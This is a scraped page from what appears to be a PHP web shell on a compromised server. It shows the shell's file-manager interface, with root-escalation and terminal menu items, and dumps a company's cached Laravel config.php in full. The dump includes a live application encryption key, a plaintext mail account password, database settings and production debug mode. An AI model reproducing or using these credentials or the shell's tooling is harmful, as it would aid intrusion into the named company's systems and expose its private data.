Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
pilasa-core /
bootstrap /
cache /
Delete
Unzip
Name
Size
Permission
Date
Action
.gitignore
14
B
-rwxrwxr-x
2017-07-11 04:08
1config.php
27.48
KB
-rwxrwxr-x
2024-07-17 14:17
config.php
26.97
KB
-rwxrwxr-x
2026-07-12 21:11
packages.php
2.57
KB
-rwxrwxr-x
2024-07-17 14:08
services.php
20.04
KB
-rwxrwxr-x
2024-07-17 14:17
Save
Rename
<?php return array ( 'app' => array ( 'name' => 'Pilasa Technologies PLC', 'env' => 'production', 'debug' => true, 'url' => 'https://www.pilasatech.com', 'timezone' => 'UTC', 'locale' => 'en', 'fallback_locale' => 'en', 'key' => 'base64:4WlQIjN1Amha9q4vkxOz5xwaq8Imx52m2tBgvDSS4QI=', 'cipher' => 'AES-256-CBC', 'log' => 'single', 'log_level' => 'debug', 'providers' => array ( 0 => 'Illuminate\\Auth\\AuthServiceProvider', 1 => 'Illuminate\\Broadcasting\\BroadcastServiceProvider', 2 => 'Illuminate\\Bus\\BusServiceProvider', 3 => 'Illuminate\\Cache\\CacheServiceProvider', 4 => 'Illuminate\\Foundation\\Providers\\ConsoleSupportServiceProvider', 5 => 'Illuminate\\Cookie\\CookieServiceProvider', 6 => 'Illuminate\\Database\\DatabaseServiceProvider', 7 => 'Illuminate\\Encryption\\EncryptionServiceProvider', 8 => 'Illuminate\\Filesystem\\FilesystemServiceProvider', 9 => 'Illuminate\\Foundation\\Providers\\FoundationServiceProvider', 10 => 'Illuminate\\Hashing\\HashServiceProvider', 11 => 'Illuminate\\Mail\\MailServiceProvider', 12 => 'Illuminate\\Notifications\\NotificationServiceProvider', 13 => 'Illuminate\\Pagination\\PaginationServiceProvider', 14 => 'Illuminate\\Pipeline\\PipelineServiceProvider', 15 => 'Illuminate\\Queue\\QueueServiceProvider', 16 => 'Illuminate\\Redis\\RedisServiceProvider', 17 => 'Illuminate\\Auth\\Passwords\\PasswordResetServiceProvider', 18 => 'Illuminate\\Session\\SessionServiceProvider', 19 => 'Illuminate\\Translation\\TranslationServiceProvider', 20 => 'Illuminate\\Validation\\ValidationServiceProvider', 21 => 'Illuminate\\View\\ViewServiceProvider', 22 => 'Collective\\Html\\HtmlServiceProvider', 23 => 'Laravel\\Tinker\\TinkerServiceProvider', 24 => 'Jimmyjs\\ReportGenerator\\ServiceProvider', 25 => 'Barryvdh\\DomPDF\\ServiceProvider', 26 => 'Mews\\Purifier\\PurifierServiceProvider', 27 => 'App\\Providers\\AppServiceProvider', 28 => 'App\\Providers\\AuthServiceProvider', 29 => 'App\\Providers\\EventServiceProvider', 30 => 'App\\Providers\\RouteServiceProvider', ), 'aliases' => array ( 'App' => 'Illuminate\\Support\\Facades\\App', 'Artisan' => 'Illuminate\\Support\\Facades\\Artisan', 'Auth' => 'Illuminate\\Support\\Facades\\Auth', 'Blade' => 'Illuminate\\Support\\Facades\\Blade', 'Broadcast' => 'Illuminate\\Support\\Facades\\Broadcast', 'Bus' => 'Illuminate\\Support\\Facades\\Bus', 'Cache' => 'Illuminate\\Support\\Facades\\Cache', 'Config' => 'Illuminate\\Support\\Facades\\Config', 'Cookie' => 'Illuminate\\Support\\Facades\\Cookie', 'Crypt' => 'Illuminate\\Support\\Facades\\Crypt', 'DB' => 'Illuminate\\Support\\Facades\\DB', 'Eloquent' => 'Illuminate\\Database\\Eloquent\\Model', 'Event' => 'Illuminate\\Support\\Facades\\Event', 'File' => 'Illuminate\\Support\\Facades\\File', 'Gate' => 'Illuminate\\Support\\Facades\\Gate', 'Hash' => 'Illuminate\\Support\\Facades\\Hash', 'Lang' => 'Illuminate\\Support\\Facades\\Lang', 'Log' => 'Illuminate\\Support\\Facades\\Log', 'Mail' => 'Illuminate\\Support\\Facades\\Mail', 'Notification' => 'Illuminate\\Support\\Facades\\Notification', 'Password' => 'Illuminate\\Support\\Facades\\Password', 'Queue' => 'Illuminate\\Support\\Facades\\Queue', 'Redirect' => 'Illuminate\\Support\\Facades\\Redirect', 'Redis' => 'Illuminate\\Support\\Facades\\Redis', 'Request' => 'Illuminate\\Support\\Facades\\Request', 'Response' => 'Illuminate\\Support\\Facades\\Response', 'Route' => 'Illuminate\\Support\\Facades\\Route', 'Schema' => 'Illuminate\\Support\\Facades\\Schema', 'Session' => 'Illuminate\\Support\\Facades\\Session', 'Storage' => 'Illuminate\\Support\\Facades\\Storage', 'URL' => 'Illuminate\\Support\\Facades\\URL', 'Validator' => 'Illuminate\\Support\\Facades\\Validator', 'View' => 'Illuminate\\Support\\Facades\\View', 'Form' => 'Collective\\Html\\FormFacade', 'Html' => 'Collective\\Html\\HtmlFacade', 'Purifier' => 'Mews\\Purifier\\Facades\\Purifier', ), ), 'auth' => array ( 'defaults' => array ( 'guard' => 'web', 'passwords' => 'users', ), 'guards' => array ( 'web' => array ( 'driver' => 'session', 'provider' => 'users', ), 'api' => array ( 'driver' => 'token', 'provider' => 'users', ), 'admin' => array ( 'driver' => 'session', 'provider' => 'admins', ), 'admin-api' => array ( 'driver' => 'token', 'provider' => 'admins', ), 'sanctum' => array ( 'driver' => 'sanctum', 'provider' => NULL, ), ), 'providers' => array ( 'users' => array ( 'driver' => 'eloquent', 'model' => 'App\\User', ), 'admins' => array ( 'driver' => 'eloquent', 'model' => 'App\\Admin', ), ), 'passwords' => array ( 'users' => array ( 'provider' => 'users', 'table' => 'password_resets', 'expire' => 60, ), 'admins' => array ( 'provider' => 'admins', 'table' => 'password_resets', 'expire' => 15, ), ), ), 'broadcasting' => array ( 'default' => 'log', 'connections' => array ( 'pusher' => array ( 'driver' => 'pusher', 'key' => '', 'secret' => '', 'app_id' => '', 'options' => array ( ), ), 'redis' => array ( 'driver' => 'redis', 'connection' => 'default', ), 'log' => array ( 'driver' => 'log', ), 'null' => array ( 'driver' => 'null', ), ), ), 'cache' => array ( 'default' => 'file', 'stores' => array ( 'apc' => array ( 'driver' => 'apc', ), 'array' => array ( 'driver' => 'array', ), 'database' => array ( 'driver' => 'database', 'table' => 'cache', 'connection' => NULL, ), 'file' => array ( 'driver' => 'file', 'path' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\framework/cache/data', ), 'memcached' => array ( 'driver' => 'memcached', 'persistent_id' => NULL, 'sasl' => array ( 0 => NULL, 1 => NULL, ), 'options' => array ( ), 'servers' => array ( 0 => array ( 'host' => '127.0.0.1', 'port' => 11211, 'weight' => 100, ), ), ), 'redis' => array ( 'driver' => 'redis', 'connection' => 'default', ), ), 'prefix' => 'laravel', ), 'database' => array ( 'default' => 'mysql', 'connections' => array ( 'sqlite' => array ( 'driver' => 'sqlite', 'database' => 'pilasatech_27_pilasawyan', 'prefix' => '', ), 'mysql' => array ( 'driver' => 'mysql', 'host' => '127.0.0.1', 'port' => '3306', 'database' => 'pilasatech_27_pilasawyan', 'username' => 'root', 'password' => '', 'unix_socket' => '', 'charset' => 'utf8mb4', 'collation' => 'utf8mb4_unicode_ci', 'prefix' => '', 'strict' => true, 'engine' => NULL, ), 'pgsql' => array ( 'driver' => 'pgsql', 'host' => '127.0.0.1', 'port' => '3306', 'database' => 'pilasatech_27_pilasawyan', 'username' => 'root', 'password' => '', 'charset' => 'utf8', 'prefix' => '', 'schema' => 'public', 'sslmode' => 'prefer', ), 'sqlsrv' => array ( 'driver' => 'sqlsrv', 'host' => '127.0.0.1', 'port' => '3306', 'database' => 'pilasatech_27_pilasawyan', 'username' => 'root', 'password' => '', 'charset' => 'utf8', 'prefix' => '', ), ), 'migrations' => 'migrations', 'redis' => array ( 'client' => 'predis', 'default' => array ( 'host' => '127.0.0.1', 'password' => NULL, 'port' => '6379', 'database' => 0, ), ), ), 'filesystems' => array ( 'default' => 'local', 'cloud' => 's3', 'disks' => array ( 'local' => array ( 'driver' => 'local', 'root' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\app', ), 'public' => array ( 'driver' => 'local', 'root' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\app/public', 'url' => 'https://www.pilasatech.com/storage', 'visibility' => 'public', ), 's3' => array ( 'driver' => 's3', 'key' => NULL, 'secret' => NULL, 'region' => NULL, 'bucket' => NULL, ), ), ), 'mail' => array ( 'driver' => 'mail', 'host' => 'mail.gmail.com', 'port' => '587', 'from' => array ( 'address' => 'contact@pilasatech.com', 'name' => 'Pilasa Technologies PLC', ), 'encryption' => 'tls', 'username' => 'contact@pilasatech.com', 'password' => 'GODblessPilasa27', 'sendmail' => '/usr/sbin/sendmail -bs', 'pretend' => false, 'markdown' => array ( 'theme' => 'default', 'paths' => array ( 0 => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\resources\\views/vendor/mail', ), ), 'stream' => array ( 'ssl' => array ( 'allow_self_signed' => true, 'verify_peer' => false, 'verify_peer_name' => false, ), ), ), 'purifier' => array ( 'encoding' => 'UTF-8', 'finalize' => true, 'ignoreNonStrings' => false, 'cachePath' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\app/purifier', 'cacheFileMode' => 493, 'settings' => array ( 'default' => array ( 'HTML.Doctype' => 'HTML 4.01 Transitional', 'HTML.Allowed' => 'div,b,strong,i,em,u,a[href|title],ul,ol,li,p[style],br,span[style],img[width|height|alt|src]', 'CSS.AllowedProperties' => 'font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align', 'AutoFormat.AutoParagraph' => true, 'AutoFormat.RemoveEmpty' => true, ), 'test' => array ( 'Attr.EnableID' => 'true', ), 'youtube' => array ( 'HTML.SafeIframe' => 'true', 'URI.SafeIframeRegexp' => '%^(http://|https://|//)(www.youtube.com/embed/|player.vimeo.com/video/)%', ), 'custom_definition' => array ( 'id' => 'html5-definitions', 'rev' => 1, 'debug' => false, 'elements' => array ( 0 => array ( 0 => 'section', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 1 => array ( 0 => 'nav', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 2 => array ( 0 => 'article', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 3 => array ( 0 => 'aside', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 4 => array ( 0 => 'header', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 5 => array ( 0 => 'footer', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 6 => array ( 0 => 'address', 1 => 'Block', 2 => 'Flow', 3 => 'Common', ), 7 => array ( 0 => 'hgroup', 1 => 'Block', 2 => 'Required: h1 | h2 | h3 | h4 | h5 | h6', 3 => 'Common', ), 8 => array ( 0 => 'figure', 1 => 'Block', 2 => 'Optional: (figcaption, Flow) | (Flow, figcaption) | Flow', 3 => 'Common', ), 9 => array ( 0 => 'figcaption', 1 => 'Inline', 2 => 'Flow', 3 => 'Common', ), 10 => array ( 0 => 'video', 1 => 'Block', 2 => 'Optional: (source, Flow) | (Flow, source) | Flow', 3 => 'Common', 4 => array ( 'src' => 'URI', 'type' => 'Text', 'width' => 'Length', 'height' => 'Length', 'poster' => 'URI', 'preload' => 'Enum#auto,metadata,none', 'controls' => 'Bool', ), ), 11 => array ( 0 => 'source', 1 => 'Block', 2 => 'Flow', 3 => 'Common', 4 => array ( 'src' => 'URI', 'type' => 'Text', ), ), 12 => array ( 0 => 's', 1 => 'Inline', 2 => 'Inline', 3 => 'Common', ), 13 => array ( 0 => 'var', 1 => 'Inline', 2 => 'Inline', 3 => 'Common', ), 14 => array ( 0 => 'sub', 1 => 'Inline', 2 => 'Inline', 3 => 'Common', ), 15 => array ( 0 => 'sup', 1 => 'Inline', 2 => 'Inline', 3 => 'Common', ), 16 => array ( 0 => 'mark', 1 => 'Inline', 2 => 'Inline', 3 => 'Common', ), 17 => array ( 0 => 'wbr', 1 => 'Inline', 2 => 'Empty', 3 => 'Core', ), 18 => array ( 0 => 'ins', 1 => 'Block', 2 => 'Flow', 3 => 'Common', 4 => array ( 'cite' => 'URI', 'datetime' => 'CDATA', ), ), 19 => array ( 0 => 'del', 1 => 'Block', 2 => 'Flow', 3 => 'Common', 4 => array ( 'cite' => 'URI', 'datetime' => 'CDATA', ), ), ), 'attributes' => array ( 0 => array ( 0 => 'iframe', 1 => 'allowfullscreen', 2 => 'Bool', ), 1 => array ( 0 => 'table', 1 => 'height', 2 => 'Text', ), 2 => array ( 0 => 'td', 1 => 'border', 2 => 'Text', ), 3 => array ( 0 => 'th', 1 => 'border', 2 => 'Text', ), 4 => array ( 0 => 'tr', 1 => 'width', 2 => 'Text', ), 5 => array ( 0 => 'tr', 1 => 'height', 2 => 'Text', ), 6 => array ( 0 => 'tr', 1 => 'border', 2 => 'Text', ), ), ), 'custom_attributes' => array ( 0 => array ( 0 => 'a', 1 => 'target', 2 => 'Enum#_blank,_self,_target,_top', ), ), 'custom_elements' => array ( 0 => array ( 0 => 'u', 1 => 'Inline', 2 => 'Inline', 3 => 'Common', ), ), ), ), 'queue' => array ( 'default' => 'sync', 'connections' => array ( 'sync' => array ( 'driver' => 'sync', ), 'database' => array ( 'driver' => 'database', 'table' => 'jobs', 'queue' => 'default', 'retry_after' => 90, ), 'beanstalkd' => array ( 'driver' => 'beanstalkd', 'host' => 'localhost', 'queue' => 'default', 'retry_after' => 90, ), 'sqs' => array ( 'driver' => 'sqs', 'key' => 'your-public-key', 'secret' => 'your-secret-key', 'prefix' => 'https://sqs.us-east-1.amazonaws.com/your-account-id', 'queue' => 'your-queue-name', 'region' => 'us-east-1', ), 'redis' => array ( 'driver' => 'redis', 'connection' => 'default', 'queue' => 'default', 'retry_after' => 90, ), ), 'failed' => array ( 'database' => 'mysql', 'table' => 'failed_jobs', ), ), 'services' => array ( 'mailgun' => array ( 'domain' => NULL, 'secret' => NULL, ), 'ses' => array ( 'key' => NULL, 'secret' => NULL, 'region' => 'us-east-1', ), 'sparkpost' => array ( 'secret' => NULL, ), 'stripe' => array ( 'model' => 'App\\User', 'key' => NULL, 'secret' => NULL, ), ), 'session' => array ( 'driver' => 'file', 'lifetime' => 120, 'expire_on_close' => false, 'encrypt' => false, 'files' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\framework/sessions', 'connection' => NULL, 'table' => 'sessions', 'store' => NULL, 'lottery' => array ( 0 => 2, 1 => 100, ), 'cookie' => 'laravel_session', 'path' => '/', 'domain' => NULL, 'secure' => false, 'http_only' => true, ), 'view' => array ( 'paths' => array ( 0 => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\resources\\views', ), 'compiled' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\framework\\views', ), 'dompdf' => array ( 'show_warnings' => false, 'public_path' => NULL, 'convert_entities' => true, 'options' => array ( 'font_dir' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\fonts', 'font_cache' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\fonts', 'temp_dir' => 'C:\\Users\\user pc\\AppData\\Local\\Temp', 'chroot' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite', 'allowed_protocols' => array ( 'file://' => array ( 'rules' => array ( ), ), 'http://' => array ( 'rules' => array ( ), ), 'https://' => array ( 'rules' => array ( ), ), ), 'log_output_file' => NULL, 'enable_font_subsetting' => false, 'pdf_backend' => 'CPDF', 'default_media_type' => 'screen', 'default_paper_size' => 'a4', 'default_paper_orientation' => 'portrait', 'default_font' => 'serif', 'dpi' => 96, 'enable_php' => false, 'enable_javascript' => true, 'enable_remote' => true, 'font_height_ratio' => 1.1, 'enable_html5_parser' => true, ), ), 'report-generator' => array ( 'flush' => false, 'pdfLibrary' => 'snappy', ), 'excel' => array ( 'exports' => array ( 'chunk_size' => 1000, 'pre_calculate_formulas' => false, 'strict_null_comparison' => false, 'csv' => array ( 'delimiter' => ',', 'enclosure' => '"', 'line_ending' => ' ', 'use_bom' => false, 'include_separator_line' => false, 'excel_compatibility' => false, 'output_encoding' => '', 'test_auto_detect' => true, ), 'properties' => array ( 'creator' => '', 'lastModifiedBy' => '', 'title' => '', 'description' => '', 'subject' => '', 'keywords' => '', 'category' => '', 'manager' => '', 'company' => '', ), ), 'imports' => array ( 'read_only' => true, 'ignore_empty' => false, 'heading_row' => array ( 'formatter' => 'slug', ), 'csv' => array ( 'delimiter' => NULL, 'enclosure' => '"', 'escape_character' => '\\', 'contiguous' => false, 'input_encoding' => 'UTF-8', ), 'properties' => array ( 'creator' => '', 'lastModifiedBy' => '', 'title' => '', 'description' => '', 'subject' => '', 'keywords' => '', 'category' => '', 'manager' => '', 'company' => '', ), 'cells' => array ( 'middleware' => array ( ), ), ), 'extension_detector' => array ( 'xlsx' => 'Xlsx', 'xlsm' => 'Xlsx', 'xltx' => 'Xlsx', 'xltm' => 'Xlsx', 'xls' => 'Xls', 'xlt' => 'Xls', 'ods' => 'Ods', 'ots' => 'Ods', 'slk' => 'Slk', 'xml' => 'Xml', 'gnumeric' => 'Gnumeric', 'htm' => 'Html', 'html' => 'Html', 'csv' => 'Csv', 'tsv' => 'Csv', 'pdf' => 'Dompdf', ), 'value_binder' => array ( 'default' => 'Maatwebsite\\Excel\\DefaultValueBinder', ), 'cache' => array ( 'driver' => 'memory', 'batch' => array ( 'memory_limit' => 60000, ), 'illuminate' => array ( 'store' => NULL, ), 'default_ttl' => 10800, ), 'transactions' => array ( 'handler' => 'db', 'db' => array ( 'connection' => NULL, ), ), 'temporary_files' => array ( 'local_path' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite\\storage\\framework/cache/laravel-excel', 'local_permissions' => array ( ), 'remote_disk' => NULL, 'remote_prefix' => NULL, 'force_resync_remote' => NULL, ), ), 'passport' => array ( 'guard' => 'web', 'private_key' => NULL, 'public_key' => NULL, 'client_uuids' => false, 'personal_access_client' => array ( 'id' => NULL, 'secret' => NULL, ), ), 'sanctum' => array ( 'stateful' => array ( 0 => 'localhost', 1 => 'localhost:3000', 2 => '127.0.0.1', 3 => '127.0.0.1:8000', 4 => '::1', 5 => 'www.pilasatech.com', ), 'guard' => array ( 0 => 'web', ), 'expiration' => NULL, 'token_prefix' => '', 'middleware' => array ( 'authenticate_session' => 'Laravel\\Sanctum\\Http\\Middleware\\AuthenticateSession', 'encrypt_cookies' => 'App\\Http\\Middleware\\EncryptCookies', 'verify_csrf_token' => 'App\\Http\\Middleware\\VerifyCsrfToken', ), ), 'flare' => array ( 'key' => NULL, 'flare_middleware' => array ( 0 => 'Spatie\\FlareClient\\FlareMiddleware\\RemoveRequestIp', 1 => 'Spatie\\FlareClient\\FlareMiddleware\\AddGitInformation', 2 => 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddNotifierName', 3 => 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddEnvironmentInformation', 4 => 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddExceptionInformation', 5 => 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddDumps', 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddLogs' => array ( 'maximum_number_of_collected_logs' => 200, ), 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddQueries' => array ( 'maximum_number_of_collected_queries' => 200, 'report_query_bindings' => true, ), 'Spatie\\LaravelIgnition\\FlareMiddleware\\AddJobs' => array ( 'max_chained_job_reporting_depth' => 5, ), 'Spatie\\FlareClient\\FlareMiddleware\\CensorRequestBodyFields' => array ( 'censor_fields' => array ( 0 => 'password', 1 => 'password_confirmation', ), ), 'Spatie\\FlareClient\\FlareMiddleware\\CensorRequestHeaders' => array ( 'headers' => array ( 0 => 'API-KEY', ), ), ), 'send_logs_as_events' => true, ), 'ignition' => array ( 'editor' => 'phpstorm', 'theme' => 'auto', 'enable_share_button' => true, 'register_commands' => false, 'solution_providers' => array ( 0 => 'Spatie\\Ignition\\Solutions\\SolutionProviders\\BadMethodCallSolutionProvider', 1 => 'Spatie\\Ignition\\Solutions\\SolutionProviders\\MergeConflictSolutionProvider', 2 => 'Spatie\\Ignition\\Solutions\\SolutionProviders\\UndefinedPropertySolutionProvider', 3 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\IncorrectValetDbCredentialsSolutionProvider', 4 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\MissingAppKeySolutionProvider', 5 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\DefaultDbNameSolutionProvider', 6 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\TableNotFoundSolutionProvider', 7 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\MissingImportSolutionProvider', 8 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\InvalidRouteActionSolutionProvider', 9 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\ViewNotFoundSolutionProvider', 10 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\RunningLaravelDuskInProductionProvider', 11 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\MissingColumnSolutionProvider', 12 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\UnknownValidationSolutionProvider', 13 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\MissingMixManifestSolutionProvider', 14 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\MissingViteManifestSolutionProvider', 15 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\MissingLivewireComponentSolutionProvider', 16 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\UndefinedViewVariableSolutionProvider', 17 => 'Spatie\\LaravelIgnition\\Solutions\\SolutionProviders\\GenericLaravelExceptionSolutionProvider', ), 'ignored_solution_providers' => array ( ), 'enable_runnable_solutions' => NULL, 'remote_sites_path' => 'D:\\Pilasa Technologies\\Projects\\Deployed Projects\\PilasaWebsite', 'local_sites_path' => '', 'housekeeping_endpoint_prefix' => '_ignition', 'settings_file_path' => '', 'recorders' => array ( 0 => 'Spatie\\LaravelIgnition\\Recorders\\DumpRecorder\\DumpRecorder', 1 => 'Spatie\\LaravelIgnition\\Recorders\\JobRecorder\\JobRecorder', 2 => 'Spatie\\LaravelIgnition\\Recorders\\LogRecorder\\LogRecorder', 3 => 'Spatie\\LaravelIgnition\\Recorders\\QueryRecorder\\QueryRecorder', ), ), 'tinker' => array ( 'commands' => array ( ), 'alias' => array ( ), 'dont_alias' => array ( 0 => 'App\\Nova', ), ), );